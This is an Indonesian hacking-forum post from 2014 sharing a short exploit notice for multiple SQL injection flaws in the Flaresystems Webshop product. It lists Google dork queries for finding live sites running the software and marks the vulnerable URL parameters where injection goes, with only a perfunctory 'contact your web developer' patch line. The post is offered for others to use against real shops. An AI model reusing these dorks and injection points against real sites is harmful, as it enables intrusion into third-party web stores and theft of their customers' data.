08-21-2014, 12:55 PM
Numpang Share exploit lagi nih om :d
Lemparin ijonya ya \m/ biar makin semangat lagi
[hide]
Teruslah berkerja Jangan berharap pada Negara !
[/hide]
Lemparin ijonya ya \m/ biar makin semangat lagi
Code:
#############################################################
## Flaresystems Webshop Multiple SQL Injection.
##
## Exploit Title : Flaresystems Webshop Multiple SQL Injection.
## Date : 21/08/2014
## Vendor: flaresystems.net
## Version : No detected , This is web costume .
## Risk : High
## Author & Find by : Kurawa ID.
## Created by : Kurawa , Cakil , Kresna , Parikesit , Abimanyu
## Thanks to : ALL INDONESIAN BACKTRACK TEAM FROM SABANG TO MERAUKE
## http://indonesianbacktrack.or.id/
## http://kurawa.indonesianbacktrack.or.id/
##
#############################################################
Dork G00GLE :
-inurl:"productpage2.php?prodID=" intext:"Web Site by Flare Systems"
-inurl:"member.php?id=" intext:"Web Site by Flare Systems"
-intext:"Web Site by Flare Systems"
Vuln :
-http://localhost.foo/catalog2.php?cat=[Inject HERE]19
-http://localhost.foo/productpage2.php?prodID=[Inject HERE]1022&page=1&cat=19
-http://localhost.foo/member.php?id=[inject HERE]if
Patch : Please contact your web developer to fix Thats bugs !
#############################################################
## Old School Never Die, New Ordo Must be Rise!
#############################################################
[hide]
Teruslah berkerja Jangan berharap pada Negara !
[/hide]
Jangan Makan Tulang Kawan | Kurawa |